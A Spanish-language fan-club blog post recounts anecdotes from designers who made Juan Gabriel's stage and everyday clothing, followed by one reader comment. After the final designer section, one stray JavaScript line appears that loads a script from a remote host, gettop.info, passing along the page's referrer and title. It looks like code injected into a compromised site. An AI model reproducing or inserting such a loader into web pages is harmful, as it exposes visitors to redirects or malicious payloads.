Historias detrás de telas. . .

Durante su carrera, Juan Gabriel nos deslumbra con sus únicos y espectaculares trajes, para ello necesitaba de que cada persona no sea solo un diseñador sino alguien que entienda lo que su mente soñaba concretar, es ahí donde comienzan las búsquedas de artistas de la tela para lograr cada detalle en su vestimenta.

Diseñadora Sonia Magaña, Mexicana

Sonia fue la última diseñadora que estuvo vistiendo a Juan Gabriel. Su paisana, originaria de Pacacuaro, Michoacan.

JGCF: Juan Gabriel y Diseñadora Sonia Magaña

Fue en un cumpleaños que fue a celebrar a Parácuaro donde Juan Gabriel la conoce, Sonia le confecciono un traje casual de regalo y en ese mismo momento el Divo le dijo “vente conmigo” y vivió con él desde hace casi 5 años en Cancún hasta la fecha de su fallecimiento.

La diseñadora tenía un taller ahí en Cancún en donde le hacía todo los pedidos para Alberto y algunas veces lo acompañaba a sus tours. 

Le gustaba que yo hiciera los diseños, en varias ocaciones le gustaba hacer cambios a último momento, no le gustaba pedir solo me decía que le gustaban su colores favoritos, nos cuenta Sonia a JuanGabrielClubdefans.com.

Algunos trajes realizados por Sonia Magaña

[flagallery gid=34]

Sonia fue quien realizo el Ultimo Traje a Juan Gabriel, seguramente algo que marcará su historia como la de cada fan.

[flagallery gid=12]

Diseñador Alex Peimbert, Mexicano

En una entrevista que Alex Peimbert, joven modisto mexicano que trabajo junto al Divo estos últimos 10 años, dio a Telemundo comento que el Divo se “animaba a todo” y no le temía a las críticas: “Una vez le pregunté si no le importaba [que lo criticaran], y él respondió ‘yo soy Juan Gabriel. Puedo hacer lo que quiera’”. 

JGCF: Diseñador de Juan Gabriel Alex Peimbert

Alex cuenta como era la selección de la vestimenta para cada presentación, “Yo ponía un rack con seis o siete trajes, todos los conjuntos perfectamente combinados, y él llegaba y combinaba todo”.

No cabe duda que uno de los trajes más destacados, más allá del significante y emotivo momento en donde lo utilizó, fue el famoso traje usado en el homenaje a Roberto Gómez Bolaños: dice Alex “Él me dijo ‘quiero vestirme de Chapulín Colorado’, y efectivamente lo Alberto lo logro.

JGCF: Juan Gabriel Roberto Gomez Bolaño

“Mientras se plasmara lo que es México en el vestuario, él estaba feliz. Es más fácil decirte eso. Colores, estampados, flores”. dijo Alex a una entrevista  con TvAzteca.JGCF: Diseñador de Juan Gabriel Alex Peimbert

Al Divo ‘le valía gorro’ (No le importaba), dice Alex como anécdota, si se dañaba el vestuario: “Yo me estresaba horrible; me moría de nervios y quería subirme con mi hilo y aguja para reparar. Pero a él la verdad no le importaba. Si se le rompía un botón o algo, se abría la camisa completa”. 

Efectivamente Juan Gabriel llevaba trajes de altos valores, dedicación, detalles realizados a mano, culturas, colores, pero sin lugar a dudas detrás de cada uno de esos ellos seguía estando Alberto Aguilera Valadez, un ser humano simple, completo, humilde, y sobre todo AUTÉNTICO. 

 

Diseñadora Rosita Hurtado, Boliviana

En febrero de 2012. Después de presentarse en Chile le comentó a Daniel Lewkowicz, piloto del avión privado en el que se transportaba y esposo de la diseñadora boliviana Rosita Hurtado, que estaba muy cansado. Este le ofreció descansar en la cabaña de su pareja en Santa Rosa de la Mina.

La diseñadora cruceña Rosita Hurtado era íntima amiga del compositor. Su esposo era su piloto
La diseñadora cruceña Rosita Hurtado era íntima amiga del compositor. Su esposo era su piloto

Fue así que Juan Gabriel llegó sorpresivamente a Viru Viru para partir inmediatamente hasta el Club Campo Santa Rosa de la Mina. La prensa nacional registró su paso casi incrédula. En su estadía de dos días probó el achachairú y quedó fascinado con la fruta amazónica, tanto que se comió 100, según Herman Antelo, su anfitrión ocasional. TambiénJGCF: Diseñadora de Juan Gabriel Rosita Hurtado visitó San Javier, conoció sobre las Misiones Jesuíticas y expresó que le recordaban a su tierra natal, Michoacán.

Anecdotas: Rosita Hurtado, cumplió 50 años y para festejarlo tiró su propia casa por la ventana dando una gran fiesta. Rodada de muchos famosos, pero la frutilla de la torta fue cuando la sorpresa se la terminó llevando ella, de repente apareció su amigo Juan Gabriel cantando junto a un grupo de Mariachis solo para ella. 

 

 

Diseñador Lázaro Morteo, Mexicano

Juan Gabriel contacto al veracruzano Lázaro Morteo luego de ver su trabajo en una revista de diseños. 

JGCF: Diseñador de Juan Gabriel Lázaro Morteo

La historia es la siguiente, Lázaro se toma una foto en la puerta de su local para publicarlo y lo hace en una revista local, es ahí donde Alberto mirando la misma lo ve y les dijo a sus asistentes:

‘quiero una cita con este diseñador’, es ahí donde me hablan y le dicen: ‘Juan Gabriel quiere verte’ y yo de inmediato, en dónde, a qué hora, y me dicen ‘en Plaza La Isla (donde yo tenía mi tienda)’, yo no me la creía, pero fui, y pasó el rato y no llegó, pensé que me habían engañado, hasta como a la hora, entra él primero que un grupo de tres personas que lo acompañaban y fue impresionante,  porque dijo: ‘yo no vengo a comprar, vengo a bendecir este lugar’ y así fue”, relata el diseñador, quien siempre se sintió muy orgulloso de verlo contento con su ropa, cuenta Lázaro a La Voz.

JGCF: Diseñador Lázaro Morteo

 

Recuerda que cuando recibía un mensaje del correo elreynoseinmuta@hotmail.com era señal de que Juan Gabriel quería algún diseño, dijo Morteo.

Unos caftanes tipo hindú fueron unos de los primeros diseños que realizo para el “Divo de Juarez”.

Mortero aclara que él jamás le hizo ropa para sus shows, lo que él le confeccionaba era ropa para el día a día, lo que le gustaba aún más, porque era lo que usaba diario

JGCF: Diseñador de Juan Gabriel Lázaro Morteo
“Tengo los mejores recuerdos de él, de su sencillez, de su trato, a pesar de su fama, siempre fue cálido, correcto, lo único que me pedía siempre, era que su ropa fuera cómoda, con la pudiera andar perfectamente en Cancún”, cuenta el diseñador a La Voz Arizona.com, quien lamenta su muerte y ya no volverlo a ver, ni cruzar la puerta de su tienda, como aquella primera vez, en Cancún, hace ya varios años

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Un comentario sobre “Historias detrás de telas. . .

  • el 18 enero, 2017 a las 7:19 pm
    Permalink

    Muy linda la nota y también me encanta que todos destacan lo sencillo y amable que siempre fue sus vestuarios fueron muy bonitos llenos de color y siempre enalteciendo a México

    Respuesta

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

shares